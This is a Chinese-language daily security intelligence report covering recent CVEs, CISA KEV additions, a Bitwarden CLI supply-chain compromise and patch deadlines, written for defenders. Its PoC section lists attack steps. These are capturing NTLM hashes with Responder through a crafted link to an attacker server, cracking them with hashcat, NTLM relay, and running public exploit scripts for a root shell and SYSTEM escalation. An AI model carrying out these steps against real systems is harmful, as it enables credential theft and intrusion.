每日安全情报报告 · 2026-04-24

每日安全情报报告 · 2026-04-24

报告日期 :2026年4月24日(周五)
情报窗口 :近 24-48 小时

⚠️ 本报告包含在野利用漏洞,请相关系统管理员立即核查并修复


一、最新高危漏洞

🔴 严重(Critical)

1. CVE-2026-23751 --- Kofax Capture(Tungsten Capture)未授权 RCE
项目 详情
CVE编号 CVE-2026-23751
CVSS评分 9.8(严重)
漏洞类型 .NET Remoting 对象反序列化远程代码执行
受影响组件 Kofax Capture(现 Tungsten Capture)6.0.0.0
攻击条件 无需认证,端口 2424 网络可达即可利用
状态 2026-04-23 披露,暂无补丁

漏洞描述:Kofax Capture 在端口 2424 上暴露了已弃用的 .NET Remoting HTTP 通道,使用默认公开的端点标识符,且对反序列化对象存在固有信任,允许未经认证的远程攻击者通过构造恶意 .NET Remoting 对象实现任意文件读写、NTLMv2 认证劫持和远程代码执行。

影响范围:任意文件读取/写入、NTLMv2 凭证窃取、远程代码执行、横向移动

参考链接NVD 详情 | GitHub Advisory | TheHackerWire 分析


2. CVE-2026-20122 --- Cisco Catalyst SD-WAN Manager 特权 API 滥用
项目 详情
CVE编号 CVE-2026-20122
CVSS评分 未公开(预估严重)
漏洞类型 特权 API 错误使用
受影响组件 Cisco Catalyst SD-WAN Manager
状态 ⚠️ 在野利用中,CISA KEV 2026-04-20 新增

参考链接CISA KEV 公告 | Cisco 安全公告


3. CVE-2026-20128 --- Cisco Catalyst SD-WAN Manager 密码可恢复存储
项目 详情
CVE编号 CVE-2026-20128
CVSS评分 未公开(预估严重)
漏洞类型 密码以可恢复格式存储(CWE-257)
受影响组件 Cisco Catalyst SD-WAN Manager
状态 ⚠️ 在野利用中,CISA KEV 2026-04-20 新增

参考链接CISA KEV 公告


4. CVE-2026-20133 --- Cisco Catalyst SD-WAN Manager 敏感信息泄露
项目 详情
CVE编号 CVE-2026-20133
CVSS评分 6.5(中等)
漏洞类型 敏感信息泄露
受影响组件 Cisco Catalyst SD-WAN Manager
状态 ⚠️ 在野利用中 ,CISA KEV 2026-04-20 新增,联邦修复截止日 2026-04-24(今日)

特别提醒 :CISA 已下发 4 天紧急指令(ED 26-03),要求联邦机构于 今日(4月24日)前 完成修复。CISA 确认三个 Cisco SD-WAN 漏洞正被攻击者积极利用,攻击者可利用认证绕过实现初始访问,再通过权限提升获取 Root 权限。

参考链接CISA KEV 公告 | BleepingComputer 报道 | Hexnode 分析


🟠 高危(High)

5. CVE-2023-27351 --- PaperCut NG/MF 未认证 RCE
项目 详情
CVE编号 CVE-2023-27351
CVSS评分 8.2(高危)
漏洞类型 身份验证不当 → 远程代码执行
受影响组件 PaperCut NG/MF
状态 ⚠️ 在野大规模利用中 ,CISA KEV 2026-04-20 新增,联邦截止 2026-05-04

参考链接CISA KEV 公告


6. CVE-2024-27199 --- JetBrains TeamCity 路径遍历
项目 详情
CVE编号 CVE-2024-27199
CVSS评分 7.3(高危)
漏洞类型 相对路径遍历
受影响组件 JetBrains TeamCity
状态 ⚠️ 在野利用中 ,CISA KEV 2026-04-20 新增,联邦截止 2026-05-04

参考链接CISA KEV 公告


7. CVE-2025-32975 --- Quest KACE SMA 认证绕过
项目 详情
CVE编号 CVE-2025-32975
漏洞类型 身份验证不当
受影响组件 Quest KACE Systems Management Appliance
状态 ⚠️ 在野利用中,CISA KEV 2026-04-20 新增

参考链接CISA KEV 公告


8. CVE-2025-48700 --- Synacor Zimbra 零点击 XSS
项目 详情
CVE编号 CVE-2025-48700
漏洞类型 零点击跨站脚本(Zero-Click XSS)
受影响组件 Synacor Zimbra Collaboration Suite (ZCS)
状态 ⚠️ 在野利用中,CISA KEV 2026-04-20 新增

参考链接CISA KEV 公告


9. CVE-2025-2749 --- Kentico Xperience 路径遍历
项目 详情
CVE编号 CVE-2025-2749
漏洞类型 路径遍历
受影响组件 Kentico Xperience
状态 ⚠️ 在野利用中,CISA KEV 2026-04-20 新增

参考链接CISA KEV 公告


10. CVE-2026-33829 --- Windows Snipping Tool NTLM 哈希泄露
项目 详情
CVE编号 CVE-2026-33829
CVSS评分 4.3(中等,实际风险更高)
漏洞类型 信息泄露 / 网络欺骗
受影响组件 Windows 10/11 Snipping Tool(31 个平台变体)
攻击条件 无需权限,仅需用户点击恶意链接
状态 2026-04-14 已修复,PoC 已公开

漏洞描述 :Windows Snipping Tool 注册的 ms-screensketch 自定义 URL 协议未正确验证 filePath 参数。攻击者构造恶意链接(如 ms-screensketch:filePath=\\attacker-server\image.png),诱导用户点击后,Snipping Tool 会向攻击者控制的 SMB 服务器发起 NTLM 认证,窃取 Net-NTLM 哈希。攻击者可离线破解密码或利用 NTLM Relay 进行横向移动。

参考链接NVD 详情 | Hoplon InfoSec 技术分析 | FreeBuf 报道


11. CVE-2026-39808 --- FortiSandbox 未授权命令注入 RCE
项目 详情
CVE编号 CVE-2026-39808
CVSS评分 9.1(严重)
漏洞类型 未授权命令注入远程代码执行
受影响组件 Fortinet FortiSandbox
状态 ⚠️ 在野利用中,PoC 已公开(GitHub: samu-delucas)

参考链接CyberSecurityNews 报道 | The Hacker Wire


12. CVE-2026-33825 --- Windows Defender BlueHammer 提权零日
项目 详情
CVE编号 CVE-2026-33825
CVSS评分 7.8(高危)
漏洞类型 TOCTOU 本地权限提升
受影响组件 Microsoft Defender for Endpoint
状态 ⚠️ 在野利用中,CISA KEV,PoC 已公开(BlueHammer + RedSun)

参考链接CyberPress 报道 | Cyderes 分析


13. CVE-2026-32201 --- Microsoft SharePoint 欺骗零日
项目 详情
CVE编号 CVE-2026-32201
CVSS评分 6.5(中等)
漏洞类型 欺骗(Spoofing)
受影响组件 Microsoft SharePoint Server
状态 ⚠️ 在野利用中 ,CISA KEV,联邦截止 2026-04-28

参考链接Tenable 分析


14. CVE-2026-5760 --- SGLang SSTI 远程代码执行
项目 详情
CVE编号 CVE-2026-5760
CVSS评分 9.8(严重)
漏洞类型 服务器端模板注入(SSTI)→ RCE
受影响组件 SGLang AI 框架
攻击方式 加载恶意 GGUF 模型触发 Jinja2 SSTI
状态 PoC 已公开

参考链接GitHub PoC | CSDN 昨日报告


二、最新漏洞 PoC

1. CVE-2026-33829 --- Windows Snipping Tool NTLM 哈希泄露 PoC

风险等级:🟠 高(CVSS 4.3,但实际利用门槛极低)

PoC 发布者:Black Arrow Security(Marcos Díaz)

攻击原理 :利用 Windows Snipping Tool 的 ms-screensketch 自定义协议处理器,通过构造恶意 URI 诱导用户点击,触发目标主机向攻击者控制的 SMB 服务器发起 NTLM 认证,静默窃取 Net-NTLM 哈希。

使用步骤

bash 复制代码
# 步骤 1:搭建恶意 SMB 服务器(使用 Impacket Responder)
sudo python3 responder.py -I eth0 -wrf

# 步骤 2:构造恶意链接
# ms-screensketch:filePath=\\\\<你的服务器IP>\\image.png

# 步骤 3:通过钓鱼邮件/网页投递恶意链接
# 受害者点击后,Responder 自动捕获 NTLM 哈希

# 步骤 4:离线破解哈希
hashcat -m 5600 captured_hash.txt /usr/share/wordlists/rockyou.txt

# 步骤 5(可选):NTLM Relay 横向移动
python3 ntlmrelayx.py -tf targets.txt -smb2support

参考链接Hoplon InfoSec 详细分析 | FreeBuf 报道 | VPNCentral 报道


2. CVE-2026-39808 --- FortiSandbox 未授权命令注入 PoC

风险等级:🔴 严重(CVSS 9.1,在野利用)

PoC 来源:GitHub samu-delucas

漏洞概述:Fortinet FortiSandbox 存在未授权命令注入漏洞,攻击者无需任何登录凭证,即可以 Root 权限执行任意操作系统命令。

使用步骤

bash 复制代码
# 步骤 1:克隆 PoC 仓库
git clone https://github.com/samu-delucas/CVE-2026-39808.git
cd CVE-2026-39808

# 步骤 2:安装依赖
pip3 install -r requirements.txt

# 步骤 3:运行漏洞利用脚本
# 用法:python3 exploit.py <target_ip>
python3 exploit.py 192.168.1.100

# 攻击者将获得目标 FortiSandbox 的 Root Shell

参考链接CyberSecurityNews 报道 | GitHub PoC 仓库


3. CVE-2026-33825 --- Windows Defender BlueHammer / RedSun 提权 PoC

风险等级:🔴 严重(CVSS 7.8,在野利用,影响 10 亿设备)

PoC 来源:GitHub Nightmare-Eclipse(Chaotic Eclipse)

漏洞概述:利用 Windows Defender 的 TOCTOU(Time-of-Check-Time-of-Use)竞态条件,实现从普通用户到 SYSTEM 权限的本地提权。BlueHammer 和 RedSun 是两个独立的 PoC 实现,已被攻击者在野联合利用。

使用步骤

bash 复制代码
# 步骤 1:克隆 BlueHammer PoC
git clone https://github.com/Nightmare-Eclipse/BlueHammer.git
cd BlueHammer

# 步骤 2:编译利用程序
# 或使用预编译的 release 版本
# 注意:需要在目标 Windows 系统上以普通用户权限运行

# 步骤 3:执行提权
# 运行后将在竞态条件窗口中替换 Defender 的敏感文件
# 成功后获得 SYSTEM 权限的 cmd.exe

# RedSun PoC(替代方案)
git clone https://github.com/Nightmare-Eclipse/RedSun.git
cd RedSun
# 同样以普通用户权限运行即可触发提权

参考链接Cyderes BlueHammer 分析 | CyberPress 报道 | Black Swan 威胁通告


4. CVE-2026-23751 --- Kofax Capture 未授权 RCE(暂无公开 PoC)

风险等级:🔴 严重(CVSS 9.8,无需认证)

PoC 状态:截至发稿暂无公开 PoC,但漏洞利用技术成熟(.NET Remoting 反序列化)

攻击原理 :连接目标端口 2424 的 .NET Remoting HTTP 通道,利用反序列化实例化远程 System.Net.WebClient 对象,实现任意文件读写和远程代码执行。

参考链接NVD 详情 | TheHackerWire 技术分析


三、网络安全最新文章

1. Bitwarden CLI 遭 Checkmarx 供应链攻击入侵

来源 :The Hacker News / Socket / JFrog | 日期:2026-04-23

摘要 :密码管理器 Bitwarden 的 CLI 工具遭 Checkmarx 供应链攻击活动入侵。攻击者通过投毒的 GitHub Actions 工作流,在 @bitwarden/cli@2026.4.0 版本中注入恶意代码 bw1.js。恶意包在 npm 上仅存活 93 分钟(17:57-19:30 EDT),但已足以造成影响。恶意载荷具备窃取 GitHub 令牌、云服务凭证、SSH 密钥等能力,并能蠕虫式传播至其他 CI/CD 管道。Bitwarden 已确认用户保险库数据未被访问。

标签#供应链攻击 #Bitwarden #Checkmarx #CI/CD安全

阅读原文 | Socket 分析 | CyberInsider 报道


2. CISA 新增 8 个在野利用漏洞,Cisco SD-WAN 三洞齐爆

来源 :The Hacker News / CISA 官方 | 日期:2026-04-22

摘要:CISA 于 4 月 20 日紧急新增 8 个在野利用漏洞至 KEV 目录,其中 3 个 Cisco Catalyst SD-WAN Manager 漏洞(CVE-2026-20122/20128/20133)被设为 72 小时紧急修复截止(4月23日)。其余 5 个漏洞覆盖 PaperCut、JetBrains TeamCity、Kentico Xperience、Quest KACE 和 Zimbra,截止日期为 5 月 4 日。CISA 同时更新紧急指令 ED 26-03,要求联邦机构立即排查 SD-WAN 系统安全性。

标签#CISA #KEV #Cisco #SD-WAN #联邦安全

阅读原文 | CISA 官方公告 | iSecNews 报道


3. Oracle 4 月关键补丁更新:修复 481 个安全漏洞

来源 :Qualys / Tenable / Oracle 官方 | 日期:2026-04-22

摘要 :Oracle 发布 2026 年第二季度关键补丁更新(CPU),共修复 481 个安全漏洞(对应约 450 个唯一 CVE),覆盖 28 个产品系列。其中超过 300 个漏洞允许远程攻击者在无需认证的情况下入侵系统。Oracle E-Business Suite 收到 18 个补丁(8 个可远程利用),Oracle Fusion Middleware、数据库和 Java 也包含大量关键修复。Qualys 建议企业优先修补面向互联网的系统。

标签#Oracle #CPU #补丁更新 #企业安全

阅读原文 | Oracle 官方公告 | Tenable 分析


4. Anthropic 发布 Claude Opus 4.7,搭载自动化网络安全防护机制

来源 :Anthropic / HelpNetSecurity | 日期:2026-04-20

摘要:Anthropic 正式发布 Claude Opus 4.7 模型,在软件工程、视觉理解和指令遵循方面显著提升。该模型首次集成了自动化网络安全防护机制,可与 Project Glasswing 计划协同运作。与此同时,Anthropic 的安全研究项目 Mythos 也在持续推进,此前已展示 AI 独立发现并利用零日漏洞的能力,引发安全圈关于"漏洞末日"的广泛讨论。

标签#Anthropic #Claude #AI安全 #漏洞发现

阅读原文 | HelpNetSecurity 报道


5. Windows Snipping Tool NTLM 哈希泄露漏洞 PoC 公开

来源 :FreeBuf / Hoplon InfoSec | 日期:2026-04-21

摘要 :安全研究人员公开了 Windows 截图工具(Snipping Tool)漏洞 CVE-2026-33829 的完整 PoC。该漏洞利用 ms-screensketch 协议的输入验证缺陷,攻击者仅需诱导用户点击恶意链接即可窃取 Net-NTLM 哈希。微软已在 4 月 Patch Tuesday 中修复该漏洞,但 PoC 公开后利用门槛极低,企业环境需特别关注。攻击者可利用泄露的哈希进行密码破解或 NTLM Relay 横向移动。

标签#Windows #NTLM #SnippingTool #凭据窃取

阅读原文 | Hoplon InfoSec 技术分析 | 腾讯新闻


6. Foresiet 报告:6 起 AI 安全攻击事件完整攻击路径分析

来源 :Foresiet | 日期:2026-04-21

摘要:安全研究机构 Foresiet 发布 2026 年 4 月 AI 安全事件分析报告,详细剖析了 6 起重大 AI 安全攻击事件的完整攻击路径,涵盖 AI Agent 数据泄露、全球恶意软件活动、AI 模型利用等场景。报告显示 AI 驱动的网络攻击同比增长 89%,漏洞利用时间已从 2018 年的 756 天压缩至不足 24 小时(28.3% 的已利用漏洞在披露当天即遭攻击)。

标签#AI攻击 #威胁情报 #攻击分析

阅读原文


7. Docker 授权绕过漏洞影响宿主机安全

来源 :CNVD / 安全社区 | 日期:2026-04-20

摘要:CNVD 收录了一个 Docker Engine AuthZ 插件绕过漏洞,攻击者可绕过 Docker 的授权机制获取宿主机控制权。该漏洞是 CVE-2024-41110 修复不完整导致的回归问题,影响使用自定义授权插件(AuthZ)的 Docker 部署环境。建议运维团队立即检查 Docker 版本并升级至最新稳定版。

标签#Docker #容器安全 #权限绕过

阅读原文


四、今日重点关注

优先级 漏洞/事件 理由
🔴 P0 CVE-2026-20122/20128/20133(Cisco SD-WAN) 在野利用 + CISA 紧急指令,今日修复截止
🔴 P0 Bitwarden CLI 供应链攻击 密码管理器被植入后门,检查 CI/CD 管道
🟠 P1 CVE-2026-23751(Kofax Capture) CVSS 9.8,无需认证 RCE,暂无补丁
🟠 P1 CVE-2023-27351(PaperCut) 在野大规模利用,CISA KEV
🟠 P1 CVE-2026-33829(Snipping Tool NTLM) PoC 公开,利用门槛极低
🟡 P2 CVE-2026-39808(FortiSandbox) 在野利用 + PoC 公开
🟡 P2 Oracle 4 月 CPU 481 个漏洞,优先修补面向互联网的系统

五、CISA KEV 联邦修复截止日历

截止日期 CVE 产品
2026-04-24(今日) CVE-2026-20122, CVE-2026-20128, CVE-2026-20133 Cisco Catalyst SD-WAN Manager
2026-04-28 CVE-2026-32201 Microsoft SharePoint Server
2026-05-04 CVE-2023-27351, CVE-2024-27199, CVE-2025-2749, CVE-2025-32975, CVE-2025-48700 PaperCut / TeamCity / Kentico / KACE / Zimbra

免责声明:本报告仅供安全研究和防御参考。漏洞信息来源于公开渠道(CISA、NVD、The Hacker News、GitHub、FreeBuf 等),请勿用于非法用途。如有遗漏或错误,欢迎指正。

数据来源:CISA KEV Catalog、NVD/NIST、The Hacker News、FreeBuf、安全客、GitHub、Qualys、Tenable、Hoplon InfoSec、CyberInsider、Foresiet、CNVD

相关推荐
C2H5OH2 小时前
PortSwigger SQL注入LAB4
网络安全
向往着的青绿色3 小时前
Java反序列化漏洞(持续更新中)
java·开发语言·计算机网络·安全·web安全·网络安全·网络攻击模型
killer Curry7 小时前
Polar CTF Reverse困难(1)
网络安全
世界尽头与你8 小时前
FastAPI Swagger Api 接口未授权访问漏洞
安全·网络安全·渗透测试·fastapi
Suckerbin8 小时前
vulnyx-Explorer靶场渗透
安全·web安全·网络安全
dollmarker9 小时前
vulnhub靶场之hacksudo: 2 (HackDudo)靶机-NFS提权
c语言·网络·网络安全·php
KivenMitnick9 小时前
CialloVOL 1.2:便捷好用的轻量化内存取证分析平台
windows·python·安全·网络安全·flask·系统安全·安全威胁分析
网络安全许木10 小时前
自学渗透测试第27天(基础补漏与工具的快捷键)
网络安全·渗透测试
锐速网络10 小时前
渗透测试中如何验证漏洞真实存在
web安全·网络安全·渗透测试·漏洞复现·sql注入·文件上传漏洞·漏洞验证